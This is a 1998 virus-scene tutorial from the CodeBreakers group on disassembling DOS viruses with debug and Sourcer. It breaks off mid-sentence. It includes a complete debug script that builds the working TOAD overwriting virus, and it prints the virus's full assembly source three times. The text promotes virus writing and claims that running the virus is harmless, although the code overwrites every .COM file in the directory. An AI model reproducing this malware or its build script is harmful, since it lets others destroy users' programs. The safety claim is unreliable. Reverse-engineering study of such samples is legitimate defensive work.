**************************************************************************

               Reverse Engineering: The Viral Approach.

                          By HornyToad & Opic             
			   
		     A CodeBreakers Production, (C) 1998                   
		        (http://www.Codebreakers.org)        
     
**************************************************************************                    

   Technology is advancing at an alarming rate everyday.  In order to keep
up with the mainstream, industry programmers have had to utilize
software reverse engineering to stay abreast of important advances.  In
a world of a million buzz words, 'reverse engineering' has made a place
for itself as a respectable activity.  Chuckling, I wonder if a thief
will eventually be called an acquisition technician.  Reverse
engineering is simply a method of prying into software to steal other
programmer's techniques.  We're not passing judgement on this practice,
quite the contrary, We're very proud to be an "engineers".  In the field of
virus writing and cracking, however, we tend to use the word disassembly
more often than reverse engineering.

   As the title indicates, the majority of this text will be devoted to
sparking interest in disassembling virus code.  Disassembly can also be
very helpful to the cracker and in general any professional programmer.
The cracker might use the disassembled code to extract and change
passwords and access privileges.  The professional programmer will most
likely be using the reverse engineering techniques to view others
techniques and advances in programming.  The virus writer will most
likely be following in the footsteps of the professional programmer.
Who knows that professional programmer might be a virus writer.  Lets
face it, if you want to learn how to program, do you want to rely on a
boring underpaid teacher to inspire you?  Or, would you like to learn
how to program by creating a virus or hacking program?  Trust me, virus
writing is fascinating and challenging.
   
   The art of virus disassembly and examination has been a practice
covered in a veil of ambiguity for quite a long time in the virus (and
even more so in the anti-virus) community.  And there is a logical reason
for this when you consider it;

On the side of the VX community:

"If anyone knows how to disassemble and debug my virus, they can learn my
techniques (which many virus writers don't want) as well as the fact
that AV can more easily scan for and disinfect the virus after examination."

On the side of the AV:

"If people understand how viruses work, and can even write their
own disinfection routines, or remove a virus infection manually then the
mystical hysteria that a viral infection brings can no longer be used to
my advantage to sell my anti-virus product" (cough-cough-mcafee-cough-cough).

   So no matter which side of the fence you stand on it should be clear
that virus disassembly should be a major part of your viral studies.
If you are a member of the AV community and find it yourself in conflict
with the fact that you are learning or reading this tutorial which comes 
from the side of the VX, take heart! The AV community will teach you the 
exact same thing that we are teaching you in this tutorial...**for a price** 
(as usual) 600 pounds is the last figure we saw for a cute little luncheon 
with a complimentary diskette with some virus from the 80's and some 
shareware AV program. So take your pick, we personally find the VX side to be
more noble working in the pursuit of knowledge, as the AV works in pursuit 
of all encompassing '$' sign.

   The virus community has undergone many changes in the past 10 years.
In the beginning, darkness covered the abyss... This beginning
passage from the Bible described the state of virus source code in the
late 80's and early 90's.  The push in the virus community was to
release virus executables, rather than the revealing source code.
Therefore, in order for the knowledge to spread throughout the
underground, coders relied on disassemblies.  Disassemblies were often
very crude in those days and rarely worked.  They did, however, shed
light on the virus writer's strategy, which, for the most part, was
enough to guide beginners in the right direction.  Over the years, the
focus of the virus community has changed.  Currently, the most common
practice is to publish source code along with the executable.  In fact,
many virus writers prefer to publish only the source code.  The
intellectual advances are becoming more important to the coders than the
destructive actions of the executable.  We prefer to see the
coder's original source, rather than an executable.  Even though we have
a test machines for watching how a virus works, viewing the original
source is the most precise method to learning the virus writer's
techniques.
   Unfortunately, this change in strategy, releasing the source code, has
led to the weakening of disassembly skills, primarily in the use of the
debugger.  A debug program is one that allows you to manipulate and view
memory locations, registers, and individual program instructions. The
DOS debug program is a powerful tool for prying open executables and
exploiting the source code.  We must footnote that a thorough knowledge of
assembly language is necessity in order to fully exploit debug.  This
article assumes that you are familiar with the basic assembly
instructions.  Our primary goal in writing this article is to spawn
interest in the reader to disassemble executables.  Don't be afraid to
uncover the secrets of the original programmer.

Debug

   There are many fine disassemblers out on the market.  If you are willing
to pay the big bucks, take a look at such programs as Sourcer, IDA, and
SoftIce.  Before you go out there and spend a lot of money on a big name
program, take a look at the one that you already have, Debug.  No, we're
not crazy.  Look in your \windows\command directory.  We'll bet it's
there.  If not, do a search of your dos files, it's hiding somewhere on
your drive.  Go to a dos prompt and type debug.  You should see the
debug prompt "-" on the next line.  Debug is loaded into memory and is
ready to use.  To quit out of debug, press "Q" then <enter>.

Lets first take a quick look at the debug commands:

*Hint*  All numbers passed to debug are assumed to be hex.  You do not
need to add the "h" at the end of the number.  We would recommend buying
a calculator that handles hex conversion.

*Hint*  Please find a copy of the MS-DOS Users Guide.  It is very helpful
for learning some of the basics about DOS operations.  It also contains a
very informative guide to debug usage.  All of the debug commands are
explained with examples.  A must for your library!
 
(A)ssemble)- Allows you to input  assembly statements and translates
"A" and press <enter>.  You will be returned an address in the form of
segment:offset.  The default offset for this command is 100.

(C)ompare- In order to compare two areas of memory, type "c memLocA
range memLocB".  This command defaults with the data segment.  The
memory contents will be displayed side by side.
 
(D)isplay-  Used simply to view a memory location.  Again the default
register is DS for this command, but you can specify any segment you
want.  For example, "-D CS:100 <enter>", displays 80 hex bytes (default)
beginning at CS:100.  The length can be specified other than the default
by including "L<length>" in the command line, for example, "-D CS:100
L100".

(E)nter- Allows you to enter data or machine code into a specified
location. Typing:
        E cs:100 B4 4E 33 C9 BA 2F 01 CD 21 72 1B B8 02 3D BA 9E
will enter this line of code starting at address cs:100.

(F)ill- Useful for filling a memory location with a specified value.
 Type:
-f 100 500 'Codebreakers Rule!'
This will fill the memory locations from 100 to 500 with some important
words to remember.  Type 'd 100' to see them.

(G)o- Executes the program loaded into memory to a specified
breakpoint. 

(H)exadecimal- This is your handy dandy hex calculator.  Enter 'H
<valueA> <valueB>', and debug will return the hex sum and difference of
the two values.  Very useful!

(I)nput- displays a byte from a port address.

(L)oad- Very useful command!  This command allows you to load a program
or disk sectors into debug.  "-L <filename>" loads a file into memory.
"-L <address> <drive> <startSector> <length>" or "-L 100 0 10 20" loads
from drive A(0) to CS:100, sector 10 and displays 20 sectors. Obviously
the default for this command is CS.

(M)ove- moves contents of one location to another.  Default is DS.
Syntax: -m ds:100 l50 DS:300  This will move from ds:100, 50 bytes to
location ds:300.

(N)ame- Names a file that you entered.

(O)utput- Sends a byte to a port.

(P)roceed- Executes through a routine.

(Q)uit- Quits debug.

(R)egister- Displays the registers and the next instruction.

(S)earch- Searches a specified range through default DS for a "string"
or data entity.  Returns location if found.

(T)race- Begins executing a program in single step mode. A range can be
specified.

(U)nassemble- Produces assembly instructions for a specified range or
simply 32 bytes when unspecified.  Default is CS.

(W)rite- Writes a (N)amed file to disk, in essence, this is your save
command.


   We think that the best way to learn how to use debug is through a
practical example.  In general people always learn faster when they have 
hands-on training.  Well, that's what you are going to get.  And guess what, 
you are going to perform your first virus disassembly!  We have specifically
chosen a small uncomplicated virus for this first example.  Below, you
will see a debug script to create an instructional virus from the
CodeBreakers VX magazine.  Study the commands.  The first line (N)ames a
program called TOAD.COM starting at CS:100.  As you can see, the next
several lines (E)nter machine code until CS:01B4.  The line, "RCX" and
subsequent line, "00B4" loads the program length into CX.  When in doubt
as to the length of the program, look at the offset at the beginning of
the line, in this case 01B0.  Then count single bytes across to the
final piece of code entered,"24", 4 bytes across.  Easy.  The next line
(W)rites the program (TOAD.COM).  The final line quits out of debug.  We
hope that you are already realizing the wealth of information that you
can get from using the debug program.  Save the information below in a
file called "toad.txt".  At a dos prompt, type: "debug toad.txt
<enter>".  Debug will then execute the instructions in toad.txt and
present you with a functional virus, toad.com.  Do not worry about this
virus spreading and destroying your system, it won't.  This a very
simple com overwriting virus.  Follow my instructions and nothing will
happen.

 N TOAD.COM
 E 0100 B4 4E 33 C9 BA 2F 01 CD 21 72 1B B8 02 3D BA 9E
 E 0110 00 CD 21 93 B4 40 B9 B4 00 BA 00 01 CD 21 B4 3E
 E 0120 CD 21 B4 4F EB DC B4 09 BA 35 01 CD 21 CD 20 2A
 E 0130 2E 63 6F 6D 00 43 6F 6E 67 72 61 74 75 6C 61 74
 E 0140 69 6F 6E 73 21 20 59 6F 75 20 68 61 76 65 20 69
 E 0150 6E 66 65 63 74 65 64 20 61 6C 6C 20 74 68 65 20
 E 0160 43 4F 4D 20 66 69 6C 65 73 20 69 6E 20 74 68 69
 E 0170 73 20 0A 0D 64 69 72 65 63 74 6F 72 79 20 77 69
 E 0180 74 68 20 74 68 65 20 54 6F 61 64 20 69 6E 73 74
 E 0190 72 75 63 74 69 6F 6E 61 6C 20 76 69 72 75 73 2E
 E 01A0 20 48 61 76 65 20 61 20 6E 69 63 65 20 64 61 79
 E 01B0 2E 0A 0D 24
 RCX
 00B4
 W
 Q


   In a way, I cheated by giving you the machine code to the virus ahead
of time.  Normally, the task of the disassembler (coder) would be to
produce source from only the executable.  Anyway, now that you have the
working virus executable, lets get to work.
 Load toad.com into a debug session by typing:

A:\debug toad.com         <-    type
-                         <-    debug prompt (ready for action)

   Remember that executable code begins after the <P>rogram <S>egment
<P>refix at CS:100. What we therefore need to do is view the <R>egisters
and find out the length of toad.com.  Typing "r" at the debug prompt,
allows you to see the values of the registers.  The important one that
we are looking for first is the initial value of CX.  CX holds the
length of the program.  In this case B4 (or 180) bytes.  Take a moment
to study the different registers.  Notice that the "r command also
printed the assembly code for the first instruction.  278E:0100 is the
segment:offset address for CS:100, or the beginning of the program.
Notice also that the IP is set to 100.  "B44E" disassembles to the
assembly instruction "MOV AH,4E".

 -r
 AX=0000  BX=0000  CX=00B4  DX=0000  SP=FFFE  BP=0000  SI=0000  DI=0000
 DS=278E  ES=278E  SS=278E  CS=278E  IP=0100   NV UP EI PL NZ NA PO NC
 278E:0100 B44E          MOV     AH,4E
 -

 Now that we have the length of the program, we can <D>isplay, or dump
the program's machine code to the screen.  This is accomplished by
<D>isplaying from CS:100 for a <l>ength of b4.  Observe below that the
data portion of the virus follows directly after the executable
portion.  This is the first clue that we have as to the offset for the
data structure.  From the beginning of the data portion of the code, any
assembly instructions that debug "translates" for you will be bogus.
 Type:      

 -d cs:100 lb4

278E:0100  B4 4E 33 C9 BA 2F 01 CD-21 72 1B B8 02 3D BA 9E   .N3../..!r...=..
278E:0110  00 CD 21 93 B4 40 B9 B4-00 BA 00 01 CD 21 B4 3E   ..!..@.......!.>
278E:0120  CD 21 B4 4F EB DC B4 09-BA 35 01 CD 21 CD 20 2A   .!.O.....5..!. *
278E:0130  2E 63 6F 6D 00 43 6F 6E-67 72 61 74 75 6C 61 74   .com.Congratulat
278E:0140  69 6F 6E 73 21 20 59 6F-75 20 68 61 76 65 20 69   ions! You have i
278E:0150  6E 66 65 63 74 65 64 20-61 6C 6C 20 74 68 65 20   nfected all the
278E:0160  43 4F 4D 20 66 69 6C 65-73 20 69 6E 20 74 68 69   COM files in thi
278E:0170  73 20 0A 0D 64 69 72 65-63 74 6F 72 79 20 77 69   s ..directory wi
278E:0180  74 68 20 74 68 65 20 54-6F 61 64 20 69 6E 73 74   th the Toad inst
278E:0190  72 75 63 74 69 6F 6E 61-6C 20 76 69 72 75 73 2E   ructional virus.
278E:01A0  20 48 61 76 65 20 61 20-6E 69 63 65 20 64 61 79   Have a nice day
278E:01B0  2E 0A 0D 24                                       ...$
-


   In both the above listing and below, it is easy to determine the end of
the program instructions.  In this case,  find the CD 20 (int 20)
instruction which terminates the virus.  Directly after the CD 20 at
location CS:012D, the first sign of a data portion appears, hex 2A, the
* character.
                          
 -u cs:100 l2f
 278E:0100 B44E          MOV     AH,4E
 278E:0102 33C9          XOR     CX,CX
 278E:0104 BA2F01        MOV     DX,012F
 278E:0107 CD21          INT     21
 278E:0109 721B          JB      0126
 278E:010B B8023D        MOV     AX,3D02
 278E:010E BA9E00        MOV     DX,009E
 278E:0111 CD21          INT     21
 278E:0113 93            XCHG    BX,AX
 278E:0114 B440          MOV     AH,40
 278E:0116 B9B400        MOV     CX,00B4
 278E:0119 BA0001        MOV     DX,0100
 278E:011C CD21          INT     21
 278E:011E B43E          MOV     AH,3E
 278E:0120 CD21          INT     21
 278E:0122 B44F          MOV     AH,4F
 278E:0124 EBDC          JMP     0102
 278E:0126 B409          MOV     AH,09
 278E:0128 BA3501        MOV     DX,0135
 278E:012B CD21          INT     21
 278E:012D CD20          INT     20


  It is important that you are aware of what bogus assembly instructions
look like.  This is where an understanding of basic assembly is
required.  Take a look below at code before the break.  It is easy to
decipher what the actual instructions are.  You might even recognize
what the virus is doing from this little snip of code.  Then, after the
int 20, all hell breaks loose.  What the hell is this "sub ch,[6f63]" ?
What an eye sore!  When code begins to look like this, you are going to
be forced to draw a conclusion:  1. The code segment has ended.   2.
The data segment might be starting.  3. We may be dealing with code
polymorphism or encryption.  There are other possibilities, but for the
sake of the beginner, at a minimum, recognize that a change has
occurred.
                             

 278E:0122 B44F          MOV     AH,4F
 278E:0124 EBDC          JMP     0102
 278E:0126 B409          MOV     AH,09
 278E:0128 BA3501        MOV     DX,0135
 278E:012B CD21          INT     21
 278E:012D CD20          INT     20
 -------------------------------------------------------------
 278E:012F 2A2E636F      SUB     CH,[6F63]
 278E:0133 6D            DB      6D
 278E:0134 00436F        ADD     [BP+DI+6F],AL
 278E:0137 6E            DB      6E
 278E:0138 67            DB      67
 278E:0139 7261          JB      019C
 278E:013B 7475          JZ      01B2
 278E:013D 6C            DB      6C
 278E:013E 61            DB      61
 278E:013F 7469          JZ      01AA



  Once you are comfortable with moving around a program within debug, it
is now time to formulate an intelligent looking disassembly.  We'd like to
classify disassembly into two different forms, the utility disassembly
and the work of art.  The utility disassembly is when someone simply
copies the debug output into a file and gives it an asm extension.  This
code can look quite ugly and may not even work.  The work of art is
when someone includes assembler specific instructions to the asm file,
gives meaningful symbolic names,  translates data, and comments the
code. For example:

1. Assembler specific instructions:
If you are using TASM, for example, and the virus is of COM file type,
include such directives as:

 code    segment
	 assume  cs:code,ds:code
	 org     100h
	  :
	  :
 code    ends
	 end     start

You might even want to include TASM compile instructions like:

     ;TASM nameOfVirus.ASM
     ;TLINK /t nameOfVirus.OBJ

Including the above instructions/structures to the code will aid people
who might not be TASM literate in assembling the virus.

2. Meaningful symbolic names:
During disassembly, whether through debug or an expensive disassembler,
symbolic names of procedures, labels, and variables are lost.  Debug
translates them as actual memory addresses.  Disassemblers often assign
them with meaningless names like "loc_1".  Take a look at the examples
below.  Which one of them would be easier for a beginner to understand?
They both accomplish the same end result, although, the code on top,
is more self-explanitory and is easier for the beginner to
understand.

 find_first:
	 mov     ah,4eh
	 xor     cx,cx
	 lea     dx,comFile
	 int     21h
	 jc      outMessage
 or

 loc_1:
     mov ah,4Eh
     xor cx,cx
     mov dx,12Fh
     int 21h
     jc loc_2


3. Translate data:
Once more, which one looks better?  Enough said.  It might be tedious
breaking out the ASCII code chart and translating the data section, but
when someone looks at your disassembly, they will appreciate it.

 db '*.com', 0
 db 'Congratulations! You have infect'

 or

 db  2Ah, 2Eh, 63h, 6Fh, 6Dh, 00h, 43h, 6Fh, 6Eh, 67h, 72h, 61h
 db  74h, 75h, 6Ch, 61h, 74h, 69h, 6Fh, 6Eh, 73h, 21h, 20h, 59h
 db  6Fh, 75h, 20h, 68h, 61h, 76h, 65h, 20h, 69h, 6Eh, 66h, 65h
 db  63h, 74h

4. Comment your code:
We have had many programming teachers say that you can never put too many
comments into your code.  We have heard an equal amount say that there
only need to be a few concise comments.  Its a never ending battle. We
would tend to recommend including more comments in than not enough.
Many beginners are given the advice that, in order to learn assembly,
you have to study source code.  That's fine and dandy, but when you're
not necessarily comfortable with assembly, looking at naked code can
give you a headache.  Try to provide enough comments so that the
beginner can understand how each line fits in to the program's
operation.  For example:
 
 mov ah,3Eh           ;function 3Eh-close file
 int 21h              ;go dos!

 mov ah,4Fh           ;function 4Fh-find next file
 jmp find_file        ;jump to find next file to infect



Essentially, that's all there is to it.  Extract the assembly
instructions and data through the use of debug into an asm file.  Tidy
the code up, add comments and turn the file into a work of art by
following the few pointers that we stated above.  We realize that this is
very short and sweet, but in order to include everything about debugging
operations, We would need to write a book.  There are many more
techniques which need to be implemented to counteract anti-debugging
techniques.  Thankfully, many of the more powerful disassemblers on the
market today can defeat the majority of anti-debugging techniques.
After trying hard to sell you on debug, We have to admit that we more
often use Turbo Debugger by Borland for viewing code.  Essentially, both
programs accomplish the same thing.  But, Turbo Debugger's delivery is
very sweet.  As you trace through your code, in separate windows you can
view the flags and registers changing dynamically.  There is a window in
the lower right-hand corner of the screen that allows you to view the
stack as values are pushed and popped off of it.  Breakpoints are easy
to set, so that you can execute your program up unto a certain point,
checking the registers and flags to see the results.  All in all, Turbo
Debugger is a fascinating program and learning tool. We highly recommend
it.

   Now, lets take a quick look at the same virus executable, but this time
we'll put it under a slightly different microscope: a disassembler.
What do we need to get started? We are going to start out with the most
simple and effective set up we can. So first things first; go collect the
tools that you don't have from the list below.
Tools we need:

1)A good disassembler (duh) or two. Many people will argue that this
disassembler is better then that one and this one sucks because that
one...blah,blah,blah, Your Boring us! The fact is that a disassembler
program is a tool: just a tool. You use it WITH your intellect and can make
it as valuable or as worthless as you wish. There are a lot of disassemblers
out there but this is the one we are going to be working with because first
of all it is relatively easy to use and second is fairly accurate and
widely available:

Sourcer 7.0 (or higher) if you can acquire it. Our other suggestion is
probably an even better disassembler: IDA. But it is much more difficult 
to acquire, and is VERY large in size, you may feel free to try the demo 
version but you will not be able to save your disassemblies (very cheap on
their part) so we choose not to use examples from it in this tutorial. 
However, we would suggest that you cross reference (double-check) your 
disassemblies from Sourcer with that of IDA's as well as through a debugger.
This will help you in recreating a more precise disassembly.

2)The Ralf Brown Int list-this is IMPERATIVE in disassembly!

You can acquire these at:
http://www.cs.cmu.edu/afs/cs.cmu.edu/user/ralf/pub/WWW/files.html
or:
http://www.simtel.net/pub/simtelnet/msdos/info/
(the file intwin**.zip -currently intwin57.zip...still updating)

3)TOAD.COM -overwriting virus which can be found in debug script in the
debugging portion of this tutorial or from Codebreakers VX Zine #1
available at:
http://www.codebreakers.org.

  Alright now we are going to start from the ground up.  What is
a disassembly? Simply it is drawing the source code of an executable
program from the program itself.  This is EXTREMELY useful in learn 
programming tricks and examining code that you do not understand and do not
have the source code to.  It is even more useful to the virus writer whom can
acquire through WWW or his/her contacts a copy of just about any virus in
executable form,but which coming across source code to can be impossible.

  Now let us interject some of the problems we see today with most
virus disassemblies and what it truly means to do a disassembly.  Most
viral disassemblies that you will download off the net are very very
sloppy code which in almost any instance wont even compile (and often if 
they will, will function NOTHING like the original virus did). This is due
to usually one simple factor: the executable was run through a disassembler
without being examined, corrected, altered etc. In other words the
person doing the disassembly just ran it through the program and zipped it 
up.This is a almost useless and definitely fruitless practice which we would
like to see an end to. What does it mean to do a "real" disassembly? Well
the most accurate disassemblies are done through debug with notepad open
recording step by step what the virus does. BUT, many of us do not have
the time to do such disassemblies, and we will argue that a disassembly done
through one of today's disassembler programs combined with some foot work
on the part of the rev engineer mixed with a bit of debugging (to clarify
the gray areas of the disassembly) can do AS good if not a BETTER job,as the
100% debug route.

The three most important aspects of doing a disassembly of a program
are:

1)Know how to set the options on your disassembler to create the most
accurate disassembly possible.

2)Having another disassembler and debugger
to cross reference with (I.E:alot of disassemblers make errors and it is
good to use more then one to get a more accurate "picture" of the program 
you are disassembling.

3)Do NOT just leave the disassembly as it lies when it comes out of the
disassembler.  The ASM file that comes from the disassembler is the RAW
material from which we will sculpt a working functioning likeness of the
original virus from.  We will need to clean it up, get rid of junk inserted
by the disassembler, get rid of locational numbers, and give labels more
descriptive names. And while we are doing that we will intuitively begin
to get a better sense of the virus we are disassembling.  You should have
the Ralf Brown files open during your entire "cleaning process" to refer to.

Constantly double check strange int's and sub-functions, make the code
"human" again.  We find the easiest way to illustrate this process is to
show you it step by step. We will show you examples from Sourcer 7.0, what 
settings and options we have chosen, and how they look in their RAW form 
straight from the disassemblers.

1)Disassembly of TOAD.COM using Sourcer 7.0 Settings:

Input file:TOAD.COM

Target assembler: TASM 5.0 (We know that TASM was what was used to
originally assemble this virus, so we will choose the most current version of
tasm as a newer version almost always supports code from older versions but
not visa versa.  It is worthwhile to investigate what assembler the author 
of the virus you are disassembling preferred as it will aid you in your 
entire disassembly. 

Also choose: (functional match).

Output filename: TOAD.ASM

File format: press F so that output displays .asm is displayed so we can
do away with those annoying segment addresses and what not Sourcer will 
otherwise insert.

Remarks:all. why not? Lets see what Sourcer can help us with.

Label type: We choose decimal, they are all annoying but this one is
easiest for me, this is pretty much just preference here.

OK, thats a pretty decent setup for Sourcer, lets see what it came up with:

 ---------------------------------------------------------------------------

PAGE  59,132

;UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
;UU                                                                      UU
;UU                             TOAD                                     UU
;UU                                                                      UU
;UU      Created:   19-Oct-97                                            UU
;UU      Passes:    5          Analysis Options on: none                 UU
;UU                                                                      UU
;UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU

target          EQU   'T5'                      ; Target assembler: TASM-5.0

include  srmacros.inc


; The following equates show data references outside the range of the program.

data_1e         equ     9Eh

seg_a           segment byte public
		assume  cs:seg_a, ds:seg_a


		org     100h

toad            proc    far

start:
		mov     ah,4Eh                  ; 'N'
loc_1:
		xor     cx,cx                   ; Zero register
		mov     dx,12Fh
		int     21h                     ; DOS Services  ah=function 4Fh
						;  find next filename match
		jc      loc_2                   ; Jump if carry Set
		mov     ax,3D02h
		mov     dx,data_1e
		int     21h                     ; DOS Services  ah=function 3Dh
						;  open file, al=mode,name@ds:dx
		xchg    bx,ax
		mov     ah,40h                  ; '@'
		mov     cx,0B4h
		mov     dx,100h
		int     21h                     ; DOS Services  ah=function 40h
						;  write file  bx=file handle
						;   cx=bytes from ds:dx buffer
		mov     ah,3Eh
		int     21h                     ; DOS Services  ah=function 3Eh
						;  close file, bx=file handle
		mov     ah,4Fh                  ; 'O'
		jmp     short loc_1
loc_2:
		mov     ah,9
		mov     dx,offset data_4        ; ('Congratulations! You hav')
		int     21h                     ; DOS Services  ah=function 09h
						;  display char string at ds:dx
		int     20h                     ; DOS program terminate
		db      '*.com', 0
data_4          db      'Congratulations! You have infect'
		db      'ed all the COM files in this ', 0Ah
		db      0Dh, 'directory with the Toad ins'
		db      'tructional virus. Have a nice da'
		db      'y.', 0Ah, 0Dh, '$'

toad            endp

seg_a           ends



		end     start
----------------------------------------------------------------------------

  O.K, not bad, not bad at all really. If we like we can attempt to
recompile this code and see if it compiles and runs properly. It looks
fairly legible, so what we can do is run it through IDA to see if we get any
differences in code construction or content. While we may not see much
here because this is a simple overwriting virus, We can assure you that you 
will see it in more complex code (We will talk about some common disassembler
flaws and errors later on). Go ahead and run Toad.com through the demo
version of IDA (if you have it) and you'll see very little variation in
code. Which means we can move on to the next step of cleaning and commenting
the code. Here is the code after we have sifted through it removed the junk
Sourcer includes and renaming locations and data labels as well as clearing
up odd bits of code.

----------------------------------------------------------------------------
;**************************************************************************
;                  TOAD Overwriting Virus 
;
;           Disassembly By Opic [CodeBreakers '98]
;
;                Recompilable with TASM/TLINK
;
;NOTES: TOAD is a simple .COM overwriting virus. I have little to say about
;this virus as it is very uninteresting by nature, and has little value
;other then as an instructive device.
;**************************************************************************

virus           segment byte public
		assume  cs:virus, ds:virus
		org     100h
toad            proc    near                    ;was far, disassembler 
						;incosistancy


start:                                          ;start of virus code
		mov     ah,4Eh                  ;function 4eh-find first file
find_file:
		xor     cx,cx                   ;clears CX register
		mov     dx,filespec             ;12Fh points to  *.com so
						;well just rename it with
						;a label to make life easier

		int     21h                     ;go DOS!
		jc      no_more_files           ;If there are no more files
						;to infect (i.e. if carry 
						;flag is set) then jump here

		mov     ax,3D02h                ;open file for read/write acess
		mov     dx,9eh                  ;get file info
						;ok heres a small difference
						;in the disassembly...in which
						;sourcer had mov dx,data_1e
						;data_1e being: 9eh
						;so lets just cut out the 
						;middle man (as the author
						;probably did......
		int     21h                     ;Go dos!
						; 
		xchg    bx,ax                   ;puts file handle in bx from ax  
		mov     ah,40h                  ;function 40h-write to file 
	
		mov     cx,offset end_virus - offset find_file

						;this is the length we want to
						;write to the file we are
						;infecting...it is the same as
						;mov cx,0B4h which the length
						;of our virus from 100h (start
						;of .com file)
		lea dx, start                   ;esentially again the same
						;command we are just making it
						;more 'human' for the reader
						;this is telling us to start
						;writing from the 'start' label
						;which is conviently located at
						;100h thus same as: mov dx,100h

		int     21h                     ;go dos!
		mov     ah,3Eh                  ;function 3Eh-close file
		int     21h                     ;go dos! 
						  
		mov     ah,4Fh                  ;function 4Fh-find next file
		jmp     find_file               ;jump to find next file to
						;infect
no_more_files:
		mov     ah,9                    ;function 9-write string to
						;standard output. ie: write a
						;message on the screen
		mov     dx,offset message       ;get the message from the 
						;data segment
		int     21h                     ;go dos! 
						;  
		int     20h                     ;int 20h-DOS program 
						;terminate
filespec        db      '*.com', 0
message         db      'Congratulations! You have infected all the COM files in this ',10,13, 
		db      'directory with the Toad instructional virus. Have a nice day.',10,13,'$' 

;here we just put the message back together in more cohesive order and changed
;the hex from 0Ah, 0Dh to its logical same: 10,13.
		     
end_virus label near                 ;just our   
				     ;formal closings
toad            endp                   
seg_a           ends
		end     find_file    ;makes sense yes?  
---------------------------------------------------------------------------- 

  Now you see? It looks very clean and is even more legible then the
code produced by Sourcer.  All we have really done is given expressive
labels to some code that was either given a generic label such as:
data_1e or given code expressed in hexadecimal such as 0B4h with the
expressive label: offset end_virus - offset find_file. We have also
corrected any small syntax errors which Sourcer may have produced. This
is the point at which we need to double check that the code compiles and the
virus runs and infects properly.  If bugs are encountered we can use debugger
to walk through the executable step by step to see where we have strayed from
the original source and where specifically our errors lie.
  Alright, now it's time for the big test, lets compare our disassembly
with Horny Toad's original source and see how it compares.

 ----------------------------------------------------------------------------

 code    segment
	 assume  cs:code,ds:code
	 org     100h
 toad    proc    near

 first_fly:
	 mov     ah,4eh
 find_fly:
	 xor     cx,cx
	 lea     dx,comsig
	 int     21h
	 jc      wart_growth

 open_fly:
	 mov     ax,3d02h
	 mov     dx,9eh
	 int     21h

 eat_fly:
	 xchg    bx,ax
	 mov     ah,40h
	 mov     cx,offset horny - offset first_fly
	 lea     dx,first_fly
	 int     21h

 stitch_up:
	 mov     ah,3eh
	 int     21h
	 mov     ah,4fh
	 jmp     find_fly

 wart_growth:
	 mov     ah,09h
	 mov     dx,offset wart
	 int     21h

 cya:   
	 int     20h


comsig  db      "*.com",0
wart    db      'Congratulations! You have infected all the COM files in this ',10,13
	db      'directory with the Toad instructional virus. Have a nice day.',10,13,'$'
 horny   label   near
 toad    endp
 code    ends
	 end     first_fly

 -----------------------------------------------------------------------------


  Ahh...you see? Identical! that's right, Using the executable file
TOAD.COM I have derived the original source code instruction for instruction.
As you have probably already guessed this feat increases in difficulty
exponentially with the complexity of the virus you are disassembling,
however using the same intuition we used to clean up this code we can create
logical patches and fixes in sections of the code produced by the 
disassembler which would otherwise not function properly.  This is the area 
of disassembly when using a secondary disassembler and debugging come in very
handy in finding the problem areas created by the initial disassembly. A true
and accurate disassembly should incorporate a debugger verifying the majority
of code produced by the disassembler.

  Other things to be aware of:
There are a few other things we'd like to touch on before we draw this to
a close. The first is simply that especially when doing reverse engineering
it is important to understand the ways a virus, or any program for that
matter functions on a 'technical' level. By this we mean you should
understand simple concepts that a surprising amount of coders do not fully
understand; i.e. understanding hexadecimal values, segment addresses, and 
other basic aspects of 8086 architectural structure.  We mention these because
it is very likely that you will run into some difficulty in making a 
disassembly due to this very fact. Allow me to illustrate with a simple 
example:

Suppose you came across this line of code in a disassembly:

mov dx,12Fh

o.k. so we know we are moving something to the data register from 12Fh
so we go to 12Fh in the data segment and we find:

 seg000:012F   db 2Ah
 seg000:0130   db 2Eh
 seg000:0131   db 63h
 seg000:0132   db 6Fh
 seg000:0133   db 6Dh
 seg000:0134   db 0

WTF is that? This is the point where most new coders stop and say "Fuck it
anyways!" and it can be frustrating to see 50-200 lines of this, but with
a bit of luck we can make this fall into place.  Its really simply just
ASCII text in hexadecimal form! 
Watch:

 db 2Ah ;*
 db 2Eh ;.
 db 63h ;c
 db 6Fh ;o
 db 6Dh ;m

 db 0   ;0

Of course! Its the filespec db '*.com',0 the type of file we are searching
for. It was simply the form that it was presented to us that was confusing.
That is what much of reverse-engineering is about: taking the code OUT
of the machine language and putting it BACK in to a moreunderstandable human
language. As for converting hex to ASCII and visa versa many dissemblers will
do it for you, some will not, in any case it proves worthwhile to get a good
book on assembly which will provide you with hex to ASCII conversions.

  Another thing to be aware of is some common errors made by disassemblers.
One such error is when the disassembler decides to translate a block of 
assembly instructions in a block of data.  When viewed, the block will look 
like a chunk of useless meaningless data. Unfortunately, that chunk of "data"
might be as important as a interrupt handler.  The key in understanding, or
shall I say translating, the data will be to look at the program code.  
Think to yourself: "What is missing in the program?  How and when is the 
chunk of data being called?"  You might even have to take a look at it 
through a debugger and even possibly encapsulate the code with breakpoints 
to see what it actually affects.  In the end, you only option might be to 
substitute the "data" with your own assembly instructions.  Be very careful 
when attempting to do this.

And yet another important fact to keep in mind when examining viruses is that
many viruses quite literally do NOT want to be examined.  That is to say;
they have been programmed with many anti anti-virus, anti-heuristic,
anti-debugger, and anti-disassembler routines which make examination a
even more difficult process, and sometimes even a risky one. The same rule we
learned as a child when dealing with wild animals applies here: If you
cannot identify an animal don't get close enough to let it harm you.
This is a pretty safe rule to live by, but I'm sure some of you wont live by
it, as we didn't, as a child and now ;) But you should keep yourself on top 
of ideas and advances in armored programming.  Most times armored programming
is not harmful but just creates an immense amount of difficulty in examining
the code, however we have heard of and seen some pretty nasty tricks laid
inside virii waiting for the Anti-virus researcher to examine, such as
hooking int 3 (which is an essential int when examining programs in debug)
and redirecting the debugger (when run upon the virus) to do anything...some
from simply displaying a witty message onto the debug screen and then exiting
without allowing the code to be examined all the way to wiping entire disks.
Though it is fairly rare to come across a virus that will actually punish the
reverse engineer, they do exist and we felt the necessity to inform you of
their existence.  Be smart, use your background knowledge of the virus
you are examining, and we're sure that the beast won't bite back.

  Hopefully, this has prepared you to begin doing quality disassemblies
of virus code.  You will learn ALOT about assembly language doing them,
and you will be contributing to the VX community by making precise source
